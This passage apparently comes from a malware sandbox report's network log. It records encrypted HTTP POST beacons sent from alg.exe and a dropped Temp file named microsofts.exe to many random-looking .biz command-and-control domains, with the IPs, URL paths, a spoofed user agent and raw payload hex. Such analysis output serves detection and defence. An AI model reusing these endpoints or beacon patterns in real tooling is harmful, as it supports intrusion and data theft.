                                                                                                                                                                                                                                                                                                          Data Ascii: mK(WOX-n%U :h5S==1NJdj03:LG6?HapKzz@|Ll 9O}?9_O2>[Shh#_`(c^)^8~.tZ)Cx4A{l;#h|7SeNoSA*-E=tYxGp<+5(8Uy


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          112192.168.2.55160218.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.354053020 CEST356OUTPOST /bteutovkpfgbea HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: whjovd.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.354195118 CEST778OUTData Raw: 6d 91 3f 58 52 85 b4 45 fe 02 00 00 16 27 4e 0c 41 b7 05 98 45 f3 57 91 61 d7 cc a9 0a b0 5f 80 1b dc b1 da a4 ce 11 73 b1 0c cc 49 5c 73 cb 0f f5 e0 d9 9f 72 32 62 51 c2 9c 8d f4 22 10 6d 32 ce bd a9 39 11 82 52 75 ad d1 2c 0c 17 39 82 68 1e 97
                                                                                                                                                                                                                                                                                                          Data Ascii: m?XRE'NAEWa_sI\sr2bQ"m29Ru,9hTg0FkGa"-44?]n!/ T0@7SE`.9aBq[xfe6,`T9rt:>mPi)g4wVno


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          113192.168.2.551603208.100.26.245807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.525702953 CEST361OUTPOST /ikwdwlrjrslefrvs HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.525855064 CEST778OUTData Raw: 32 f9 af a0 03 e9 fb a5 fe 02 00 00 d0 99 f1 15 1c df 48 05 16 74 ba 32 43 92 77 eb ea 25 32 d6 ad 22 a5 4d 44 03 2c 16 94 6b 9e 2a 19 c5 cf e0 8a 4b cc 3f 28 cf 03 23 36 bc 01 10 42 78 2a cc 00 f0 bd 85 9d 3d a8 39 0b 8b e0 e5 d5 6a 0e 13 5b 88
                                                                                                                                                                                                                                                                                                          Data Ascii: 2Ht2Cw%2"MD,k*K?(#6Bx*=9j[vV',IXt{(CDm&>Ls}W]XALK5:<92}OvX);Pz4hT@s&fBZ;oJ=W$P1@<
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.057127953 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:11 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.100980997 CEST359OUTPOST /xvwjoyasecofgd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.101013899 CEST778OUTData Raw: dd 43 ff f2 d2 75 70 c3 fe 02 00 00 8a 25 65 4d 31 09 69 62 68 6f 7f e8 bb 27 e5 7b da 4e 37 83 29 b3 b7 63 ce e7 63 14 29 05 64 a4 db 2a 2d a5 35 be 74 1c fa d7 28 85 ca f4 0c d4 81 e6 aa 09 0e 6a a2 b3 19 7f 6b b4 10 82 70 31 da 9b 3d bb d5 d5
                                                                                                                                                                                                                                                                                                          Data Ascii: Cup%eM1ibho'{N7)cc)d*-5t(jkp1=:erP]~2>WV4O)idpiRlj"Ajc{Klv<b_CF:HL9yW0E_(+m1AQBPo"we\Ok
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.215162039 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:09:12 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          114192.168.2.55160434.211.97.4580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.284585953 CEST347OUTPOST /majxvi HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: esuzf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.284585953 CEST828OUTData Raw: 45 9e d3 e6 44 59 be 13 30 03 00 00 a2 de ba 28 d7 ba bc 2e 39 f2 36 9d 62 64 2a 23 a6 82 dd a7 c8 a3 a4 39 55 6e 36 bd 56 0c b9 72 d2 c3 69 6e 19 8a b7 f0 b1 1b 4e c7 f2 40 99 ec 22 a5 5c d6 a4 79 b8 eb 0f 28 1c 77 50 a5 0e 73 80 70 84 d6 64 58
                                                                                                                                                                                                                                                                                                          Data Ascii: EDY0(.96bd*#9Un6VrinN@"\y(wPspdX4(XDsr^idjRe;N<(}X(<L*&&aH]x:6`PlM!;eH;{O#(nRpJy]qixmf~t


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          115192.168.2.55160534.211.97.4580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.296545982 CEST348OUTPOST /xtlulck HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: esuzf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.296545982 CEST828OUTData Raw: 76 68 8e dc a3 6e 1d 8e 30 03 00 00 d0 b4 f1 8f 1a e4 fb ad e2 3a 16 69 43 5f 03 b4 83 3d 51 78 35 54 9c 15 68 6c 83 c8 0c c6 f4 d7 15 a0 04 f3 d9 d3 7a 88 57 e1 b9 a2 c8 02 b2 ae b0 ee 37 0b 76 95 0b fa 79 6b 29 83 56 bd 14 9e 89 f4 e0 56 90 f2
                                                                                                                                                                                                                                                                                                          Data Ascii: vhn0:iC_=Qx5ThlzW7vyk)VV<6~B3Oy}L>}nTQS$-zSdOEZf7bw"Nw>c-H.xE&r[[9eO0!,F4%T{N


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          116192.168.2.5516063.94.10.3480576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.323173046 CEST361OUTPOST /dnygdywcggkonbfe HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.323195934 CEST828OUTData Raw: 0f df 7c ed 74 3f ec 2a 30 03 00 00 27 1a cb 45 ec 1c 50 ce d2 86 43 47 b5 a6 13 a0 14 22 be c9 00 42 87 2d cf bd 7e 17 14 9d da e6 32 e3 46 4e 8d 94 98 dd 43 e3 80 76 6e b8 44 4f 7d 6f c6 b1 82 fe 69 b7 95 44 c6 a0 ba 73 6e 29 b2 bb 01 80 32 f4
                                                                                                                                                                                                                                                                                                          Data Ascii: |t?*0'EPCG"B-~2FNCvnDO}oiDsn)2)#*%Mm|O'5+zlA2}b<.":IpJi|_)wE@[S\Nm?s}%O[F7MFzmv@||


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          117192.168.2.5516073.94.10.3480576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.335114002 CEST354OUTPOST /njgjrpxmf HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.335136890 CEST828OUTData Raw: a8 52 54 00 d8 e7 60 b4 30 03 00 00 c6 76 3f 82 3d cd 9a 23 73 1d 28 8a 4a ae 0d 51 d8 0e 76 64 51 52 01 32 07 d4 f3 ec d8 d3 63 a3 89 df 7c c9 17 6b 5a 6d 2e 46 33 d7 ea b7 ea bc 35 80 fe a6 8b aa 88 21 57 de 3b e0 ea ad 09 88 3c 56 14 7c c3 94
                                                                                                                                                                                                                                                                                                          Data Ascii: RT`0v?=#s(JQvdQR2c|kZm.F35!W;<V|jzzP)[,?{Q)^ngXh^5]bu=Gr%;K$4u|,~n|9Nhug+wfM04$rw<>@D._%6nLsVaF`)3K4q/


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          118192.168.2.55160844.213.104.8680576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.361186981 CEST345OUTPOST /rd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.361239910 CEST828OUTData Raw: 41 e1 44 46 f1 4b dc 37 30 03 00 00 c4 d6 1b e2 ce 4a 8a 7a d5 08 dd 11 dd 0f 0d e4 e4 b6 4a d9 c5 03 ab c4 2a 02 9d 28 c3 b2 97 94 b5 4a 70 d4 12 90 6e f4 bf 24 a5 64 1c f6 a7 ba 2e 6c 4f 27 34 da b0 61 ac a3 88 6d 01 94 4c aa 98 97 ee ff e4 50
                                                                                                                                                                                                                                                                                                          Data Ascii: ADFK70JzJ*(Jpn$d.lO'4amLPiwcHHV\{vfeI6Dl8-NGleJ#3d0eo@~6+.#PH"6^|n[YI}b[>1_


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          119192.168.2.55160944.213.104.8680576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.374170065 CEST345OUTPOST /wi HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.374262094 CEST828OUTData Raw: 41 fd 5c 79 a4 07 e4 30 30 03 00 00 c7 c3 66 7b d3 a3 c1 3a df 23 41 4b e0 05 03 d4 d7 e3 0c e1 a4 35 92 2d 7c a2 d2 90 cb 11 b3 ab 30 86 08 9a 82 a0 a0 2d 93 b5 c9 f3 3f 8f 70 6c cb f7 51 27 47 02 2b 56 c8 ae 1c 9b 55 e1 ef b5 a1 09 a9 fc 97 75
                                                                                                                                                                                                                                                                                                          Data Ascii: A\y00f{:#AK5-|0-?plQ'G+VUuK`nUxa!y?GtMjXwh9i=I]%N;4 DiHw>vTkidt+]S!~[/8PihO_>Z.R5


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          120192.168.2.5516103.254.94.18580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.399497032 CEST355OUTPOST /sqaajldpmyrnnl HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: brsua.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.399528980 CEST828OUTData Raw: 0d 53 f1 b8 af 58 64 1d 30 03 00 00 6f 8b c4 7d ec 59 6f 97 24 dc 3c 8a f2 3e 6e 41 da 4d 1f 9b 36 5a 4c 37 f8 79 f1 44 db 4e 49 c9 dc 0c fd 67 17 d5 a0 5c fa 29 32 43 c4 7c f4 d0 80 96 37 95 34 ed 02 48 b2 ca 9a d5 eb 1d 40 ea 44 18 27 9e 75 9e
                                                                                                                                                                                                                                                                                                          Data Ascii: SXd0o}Yo$<>nAM6ZL7yDNIg\)2C|74H@D'ug*$~I<yg_9g)b=DL#RvUNBk:gw>*85x=tJV83tn:$DjLE7|eR)VbMhK{rQzbEJgc'!uwq


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          121192.168.2.55161144.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.409859896 CEST355OUTPOST /cgofyarxpklm HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: reczwga.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.409883022 CEST778OUTData Raw: 6c b4 e7 da 4b 48 d7 49 fe 02 00 00 64 33 ec 2e 2f 53 87 04 ef 22 0a 4a 1d f3 b8 f6 6d ea 8a 1b 1d e7 04 c1 78 b9 d6 d9 1b a4 7c df e4 96 ad a9 9e d2 6c 81 d5 2d e2 67 42 e9 09 b1 b4 09 12 c4 d5 26 47 fe dc a9 de fd 7c 75 75 e7 cd 80 f5 bb dd d4
                                                                                                                                                                                                                                                                                                          Data Ascii: lKHId3./S"Jmx|l-gB&G|uu)&;fm=K5~>()!M{xZUWU/]b_{e3Sv(i:72PLS2~&@UfO{4Nw9ewtE<s`:nv0^\


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          122192.168.2.5516123.254.94.18580576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.411799908 CEST350OUTPOST /cgtrhhgqi HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: brsua.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.411849976 CEST828OUTData Raw: a8 de cc 00 5b 93 85 8f 30 03 00 00 6b e3 80 1f 54 ad 08 65 e3 e6 2b 9f d9 e1 16 5a e3 a6 a8 32 e1 35 b6 5e 60 19 46 7b 12 15 7e 8d c9 05 68 79 ee 60 1a 2c a1 6a e6 21 46 3a 22 b5 92 4c 12 22 b5 b6 22 26 b1 cc f6 bc 35 7a ed f3 4d 8d db 2e 74 f8
                                                                                                                                                                                                                                                                                                          Data Ascii: [0kTe+Z25^`F{~hy`,j!F:"L""&5zM.tDW}Z$f5m@feNiYmw9^GXPM#Ur.6>[7ja-!3/-W5ejP4X<NhqJEn*lNCW


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          123192.168.2.55161385.214.228.14080576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.450635910 CEST349OUTPOST /qtgyq HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.450663090 CEST828OUTData Raw: 11 0c 59 26 53 01 87 b5 30 03 00 00 2d 0a 9e d6 b4 6d c5 20 2c 26 76 d0 54 1f 68 0d ad 69 25 81 14 8f 9d 21 85 6b 36 8d 10 5e f5 6c 6e 8d e9 c1 26 2c 04 04 8f c8 93 d9 67 a8 f4 23 86 b4 be 83 48 8d c3 2f 28 87 66 9a 1d 84 10 bb 77 c0 af 80 6d 8f
                                                                                                                                                                                                                                                                                                          Data Ascii: Y&S0-m ,&vThi%!k6^ln&,g#H/(fwmcZ|a|n?EZqz!\dV2aYn'bZz/#QmYiKn20;F,Dn@iKEt/bcTu\wMlz|K^@M&+


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          124192.168.2.55161444.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.464559078 CEST349OUTPOST /wcihxt HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: reczwga.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.464559078 CEST778OUTData Raw: 05 0b a7 ba fc 34 44 db fe 02 00 00 e5 6a 42 e4 8f 6a ff b6 32 d9 45 4b 57 11 fc 16 bf 3d 8a 03 9b 9a e2 d4 96 38 25 40 a6 22 1a 87 9d 1c c0 8e 49 54 0a 2c 70 15 0a fc 9a 52 d1 02 90 6d 52 1f f2 13 11 a3 47 33 35 b0 d5 08 ad 3a bf f8 fc 44 1f 58
                                                                                                                                                                                                                                                                                                          Data Ascii: 4DjBj2EKW=8%@"IT,pRmRG35:DXV5inNEy-e)i.~n/;HJ3t0'A=03+ezzWF}^N-Q~;FFV+lLy=08-6d]_%+J!_[$$J


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
